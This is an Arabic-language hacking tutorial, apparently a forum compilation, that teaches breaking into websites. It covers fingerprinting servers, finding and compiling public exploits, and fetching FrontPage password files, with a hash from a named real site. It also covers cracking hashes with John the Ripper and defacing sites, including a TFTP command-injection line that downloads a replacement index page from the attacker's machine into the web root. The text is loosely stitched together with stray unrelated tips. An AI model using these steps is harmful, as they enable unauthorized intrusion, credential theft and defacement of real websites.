بعد أن حصلت على المعلومات عن الموقع عليك البحث لما يمكن أن تجد له ثغرات في المواقع الموجودة بالأسفل هنا وستتعلم الآن ما يأتي :
هذا الملف يحتوي على : - ماهي ا&##1604;ثغرات: [ تعريف لها + أسماؤها باللغة الإنجليزية + بعض المصطلحات + ..... ] - أنواع &##1575;لثغرات. [ ثغرات المتصفح + الاستثمارات أو الاكسبلويتس] - كيفية &##1575;ستثمار الثغرات. [ استثمار ثغرات اليونيكود والمتصفح - استثمار الاستثمارات في ويندوز - في لينيكس ] - أشياء &##1605;تفرقة. --------------------------------------------------------------------------------------------------
بسم الله الرحمن الرحيم :
1- ماهي الثغرات ؟ الثغرات هي أخطاء برمجية في برامج معينة مثل سيرفرات المواقع وأي برامج اخرى ، لأنها من صنع البشر لذا يجب أن تحتوي على أخطاء أو ( ثغرات) وهناك أنواع أخرى عبارة عن برامج مصممة ومكتوبة بلغات معينة لاستغلال ثغرة معينة. ويطلق عليها أسماء كثير مثل : Exploits - Bugs - holes - security holes - vulnerabilities
2- أنواع الثغرات :
أولا : ثغرات المتصفح : هي ثغرات يتم استغلالها من المتصفح وتلحق باسم الموقع ولها أنواع مثل اليونيكود وثغرات السي جي آي CGI bugs وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي . ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح. الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل: /cgi-bin/passwd.txt إذا كان الموقع هو www.somesite.com فتكتب الثغرة هكذا في المتفح www.somesite.com/cgi-bin/passwd.txt هذه الثغرة تعرض لك أسماء المستخدمين وكلمات المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين (حتى هذه الثغرة يمكن ألا تصلح معهم ) أما الثغرات الأخرى الخاصة بالمتصفح فيمكنك التأكد من وجودها فقط من خلال المتصفح ثم الحصول على استثمار لها الاستثمار Exploit : هو برنامج صغير يكتب بلغة برمجة معينة ويمكن الاستفادة منه في استغلال ثغرة معينة موجودة بالموقع
وتكتب ببعض لغات البرمج مثل - لغة سي C -لغة بيⵁل Perl - لغة ال&##1594;لاف أو شل shell ويمكن استثمار هذه الثغرات من الويندوز لكن يجب توفر بعض البرامج أما من اللينيكس فهو أفضل ولا يجب توفر أي برامج..
- كيفية &##1575;ستغلال الثغرات : 1- ثغرات المتصفح تم ذكرها بالأعلى وهذه بعض المواضيع الممتازة عن ثغرات اليونيكود والمتصفح :
شرح عن اليونيكود انقر هنا
شرح آخر عن اليونيكود انقر هنا \
شرح آخر انقر هنا وشرح آخر أيضًا انقر هنا
شرح عن ثغرات السي جي آي انقر هنا
شرح آخر باللغة الإنجليزية انقر هنا
ثانيا : الاكسبلويتس أو الاستثمارات Exploits الاستثمارات أو الاكسبلويتات Exploits وهي كما قلنا برامج تكتب بلغات برمجة معينة لاستغلال ثغرة في الموقع إما في سيرفر الموقع أو في نظام التشغيل أو في بعض البرامج الموجودة على الموقع مثل المنتديات وأي برامج موجودة على الموقع مثل قوائم الاستفتاء أو سجل الزوار أو حتى عداد الزوار باختصار كل سكربتات بيرل وسي جي آي. ( راجع الدرس الأول )
عندما تجمع المعلومات عن الموقع كما في الدرس الأول مثل معرفة نوع سيرفر الموقع أو برنامج الإف تي بي الذي يستخدمه الموقع مثلا إن علمت أن سيرفر الموقع هو IIS4 فعليك الذهاب إلى أحد مواقع الهكرز المكتوبة بالأسفل والبحث عن ثغرة أو استثمار لها وابحث عن IIS 4 وبعد أن تحصل على الاكسبلويت عليك إستثماره : أولاً : الاستثمارات في ويندوز : - إذا كا&##1606; الاكسبلويت مكتوبًا بلغة بيرل تستطيع ترجمتها أو عمل Compiling لها عن طريق برنامج Active Perl من شركة Active state www.activestate.com عن طرق الأمر التالي في الدوس perl exploit.pl ثم تظهر طريقة الاستعمال التي يجب أن تتبعها. الوصول للدوس من هنا start==>run ثم اكتب command إبدأ==>تشغيل==>command - ام الا&##1603;سبلويتات المكتوبة بلغة سي فيلزمك برنامج لترجمتها يسمى Borland C ++ Compiler حاول أن تجده بنفسك. - أماالⵕكتوبة بلغة شل فلا يوجد طريقة لاستغلالها في ويندوز على حد علمي.
ثانيًا : الاستثمارات في لينيكس : لينيكس نظام التشغيل الشهير هو نظام رائع جدا ومع أنه تتوفر فيه كل البرامج التي تساعد الهاكر إلا أنه ليس للهاكرز فقط وتكمن قوته في سطرالأوامر إذا أردت ترجمة ثغر ة مكتوبة بلغة سي C أولا يجب عليك تحويلها إلى برنامج تنفيذي عن طريق الأمر
gcc exploit.c -o exploit
ثم تشغيل الملف وقراءة التعليمات
أما إن كام مكتوبا بلغة بيرل فقط اكتب اسم الملف وستظهر لك طريقة التشغيل والباقي عليك..
مواقع أمن رائعة يمكنك البحث فيها عن ثغرات ومواقع هكرز عربية وأجنبية وأنصجك بشدة بالتسجيل في قوائمهم البريدية حيث يمدونك بأحدث الثغرات أولاً باول ويوميا نصيحة : استخدم بريدًا وهميا بمعلومات وهمية وأسماء وهمية
أولا :إفتح الدوس start>programs>command prompt ثالنيا: إدخل إلي الديركتري اللذي تريده مثال : إذا كان على ال c:abdflash_king أكتب :c ثم إنتر و cdabd أكتب الإمر ren ثم مسافة و إسم المجلد الذي تريد تشفيره ثم مسافة و إضغط alt+188 إضغط ألت و 188 في نفس الوقت ليظهر لك رمز ثم إضغط إنتر وسيكون بذلك مقفل بإحكام إذا كنت تريد فتحه إقلب العملية يعني بتحط بعد ren مسافق ثم الرمز alt+188 و مسافة و بعدين الإسم الجديد الذي تريد أن تسميه به
ملا حظة يمكنك وضع بدل الرمز alt+188 أي رمز آخر كالرمز alt+199 بدل الرقم 188 لكن هناك إرقام محدودة
الحين احنا اخترقنا موقع ونبي نغير صفحة البداية ونكتب تم اختراق هذا الموقع كيف؟ تقدر تغير الصفحه الرئيسه لما يكون الباسورد حق الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا index افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء الي تبيها ببرنامج اسمه cute FtP WS_FTP PRO والبرنامج سهل اللي يبي شرح يقولي
------------------------------------------------------------------------------------------------ 17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها ) هذي من أفضل برامج البحث عن الثغرات وانشاء الله تعجبكم انت بس ادخل وتلقى: ============================================
************* 8- voideye http://content.443.ch/pub/security/...ner/VoidEye.zip نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على sss **************************************************
************* الملقمات اشهرها اثنين: - 18 IIS: من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها). apache: من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب. ----------------------------------------------------------------- 19- اول خطوة في الاختراق هي اخذ المعلومات: يعني نعرف الموقع شنو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها. طيب الحين عندنا موقع وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع http://www.netcraft.net/ http://www.whois.com/ ملاحظة: نكتب الموقع من غير http:// ولا / اللي بالاخير او نستخدم التلنت. 1 - مثال على ملقمات اي اي اس: راح يطلع لنا التالي The site http://www.***.org/ is running Microsoft-IIS/5.0 on Windows 2000 طيب الحين عرفنا معلومتين مهمتين اول شيء انه شغال على الملقم IIS5.0 ثاني شيء شغال على نظام ويندوز 2000 اول شيء نجرب ثغرات IIS5.0 عليه إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000 طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات IIS وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. طيب لنفرض انه ماطلع فيها ثغرات؟ نشوف محتويات الموقع نفسه نشوف إن كان عنده سجل زوار او منتدى او .... 2 - مثال على ملقمات اباتشي: ناخذ مثال موقع ارانك http://www.arank.com/ لو حللناه بالنيت كرافت راح نشوف النتيجة التالية: The site http://www.arank.com/ is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux هنا يهمنا ثلاث اشياء:- 1- الملقم وهو: apache 1.3.20 2- ودعم فرونت بيج وهذه مليانة ثغرات FrontPage/5.0.2.2510 3- النظام وهو Linux -=-=-=-=-=-=-=-=-=-=-=-=-=-=- الملقم: اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد _vti_pvt و _private هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي service.pwd و users.pwd و authors.pwd و adminstators.pwd ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال goodyco:CalXS8USl4TGM وهذا من موقع قودي http://www.goody.com.sa/_vti_pvt/service.pwd طيب الحين goodyco اليوزر والباسورد مشفر واللي هو CalXS8USl4TGM وشلون ينفك؟ ينفك ببرنامج اسمه john the repaier ( شرح الاستخدام موجود في اخر موضوع في هذا المجلد) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال telnet واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال c وهذه ماتشتغل إلا عاللينكس فقط. ---------------------------------------------------------------------- 20- (مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات وووو....) http://www.ussrback.com/ الموقع هذا خطير جداً جداً تروح ل EXPLOITS اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من c و perl و يوني كود. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- http://neworder.box.sk هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين IIS او apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- أرشيف لثغرات www.securiteam.com/exploits/archive.html أرشيف لثغرات www.ussrback.com أرشيف لثغرات www.secureroot.com أرشيف لثغرات www.rootshell.com أرشيف لثغرات www.ussrback.com مواقع لثغرات www.secureroot.com/category/exploits --------------------------------------------------------------------- 20- هناك انظمة وملقمات كثيرة منها: Apache (الملقم) IIS(الملقم) SunOS(الملقم) FreeBSD (My BaBe)(الملقم) OpenBSD(الملقم) NetBSD(الملقم) AIX(الملقم) IRIX(الملقم) NetScape(الملقم) Enterprise(الملقم) Windows/NT/2000/xp (نظام التشغيل) Linux(نظام الشتغيل ) ------------------------------------------------------------------- له ست مجلدات) 21- (اليونكس
bin خاص بالملفات الثنائيه يعني اللي تشغل النظام etc ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd dev ملفات الاجهزه lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل tmp الملفات الموقته او غير الثابته usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام -------------------------------------------------------------------- 22- (اوامر الاف تي بي) Pwd لكي تعرف ما يحتويه الهارد ديسك Cd لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Ls لكي يتضح لك محتوى المجلد أو الهارد ديسك Get لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Put العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في في جهاز الضحية مثال Put black.exe Clos لقطع الإتصال مع الضحية يمكنك تشغيل الاف تي بي من الويندوز عن طريق : START > RUN > ftp -n hostname ---------------------------------------------------------------------------- 23- بورتات برامج:- 7 echo 21 telnet 23 ftp 25 smtp 80 http 110 POP ---------------------------------------------------------------------------- c - 24 هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك Linux او Shell Account ---------------------------------------------------------------------------- 25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404 Error وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق. -------------------------------------------------------------------------- تابع الموضوع
و تنقسم الشيل اكونتس الي نوعين: 1-restricted 2-non-restricted و الفرق بينهما ان restricted مدفوع القيمه و يمكنك من تنفيذ اي command اما ال non restricted فهو مجاني و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل www.cyberarmy.com او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها بالتالي: 1-telnet 2-nslookup و الذي يعطيك معلومات عن المضيف 3-ftp 4-finger 4-trace route 5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه 6-netstat 7-gcc و هذا كمبيلير للغه البرمجه c 8-gzip لفك ضغط الملفات 9-lynx متصفح للانترنت
------------------------------------------------------------------ تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27 .TFTP -=-=-=-=-=-=-=-=-=-=-=-=- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\ قم بتشغيل برنامج TFTP :ونفذ الامر في الفقرة التالية /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.ht m tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر "-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات 1.1.1.1 رقم الايبي الخاص بك GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال index.htm اسم الملف بجهازك \inetpub\wwwroot\ اسم الدليل في السيرفر index.htm اسم الملف على السيرفر ----------------------------------------------------------------- تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 28 www.sitename.com:2082 أو www.sitename.com/cpanel هذا في حال كان الموقع يستخدم الـ CPanel وهو البرنامج الأكثر شيوعاً .. ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر .. وتصير في الداخل. ---------------------------------------------------------------- 29- اماكن تواجد ملف باسوورد المواقع: Sunos 5.0 etc/shadow او etc/passwd Linux etc/shadow او etc/passwd BSD4.3 –RENO etc/master.passwd AIX etc/security/passwd NT ويندوز scripts/passwd ---------------------------------------------------------------- 30- كيف اتاكد انا الثغر شغالة ولا لا؟ - جرب اللثغرة بواسطة الـ URL او الـ URI . ---------------------------------------------------------------- 31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟ (IIS4.0 on WinNT) http://www.microsoft.com/ntserver/n...862/default.asp (IIS5.0 on Win2000) www.microsoft.com/windows200...862/default.asp ---------------------------------------------------------------- 32 - ما الفرق بين ملف الباسورد المشفر encryption والمضلل shadowed? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- الملف المضلل shadow file يكون مكان كلمة المرور رمز مثل * أو x أو # أو ! وهذا مثال لها root:x:0:1:Super-User:/:/sbin/sh لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw ------------------------------------------------------------------- وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - 33 -=-=-=-=-=-=-=-=-=-=-=-=-=-=- يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير. ------------------------------------------------------------------- 34 -اذا كان ملف passwd مضلل ماذا تفعل؟ الان جميع ملفات passwd تكون مضللة ولكن توجد طريقة لفكها اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو shadow ماهي اماكن تواجد ملف shadow في الأنظمة؟ وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي: Linux : /etc/shadow token = * SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو * FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x IRIX : /etc/shadow token = x AIX : /etc/security/passwd token = ! ConvexOS : /etc/shadow or /etc/shadpw token = * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- token تعني الرمز الذي يوجد في الملف passwd وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه). ملف الشادوا تكون الكلام الذي فيه مشفر الخظوة الأخيرة وهي دمج ملف shadow & passwd انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج ********************************************** http://packetstorm.securify.com/Crackers/john-16w.zip http://www.geocities.com/wildxone2002/john16.zip http://www.diabolo666-security.com/...er/john-16d.zip http://www.openwall.com/john ********************************************** انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج الامر هو unshadow passwd.txt shadow.txt اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة x التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x تكون في ملف الباس ------------------------------------------------------------------- 35- فك تشفير ملف shadow asswd بعد دمجه مع ملف x وهو طريقة فك تشفير ملف passwd الدليل الكامل لكسر كلمات السر برنامج John the Ripper لكسر كلمات السر ----------------------------------------------------------------- برنامج - 36 (John the Ripper) احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة (nix*) وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف (PASSWD) بان يكون مضلل وعلى المخترق الحصول على ملف (SHADOW) لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح . ---------------------------------------------------------------- 37 - كيف استغلال الباسورد: يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد او انك تدخل من الاف تي بي وهو الأسهل والمنتشر كيفية الدخول ب ftp يمكنك استخدام احد برامج ال ftp منها ws_ftp او CuteFTP 4.2.5 Build 10.4.1 وعنوانه http://63.162.136.2/seniormoments/t...es/fo-wsf76.zip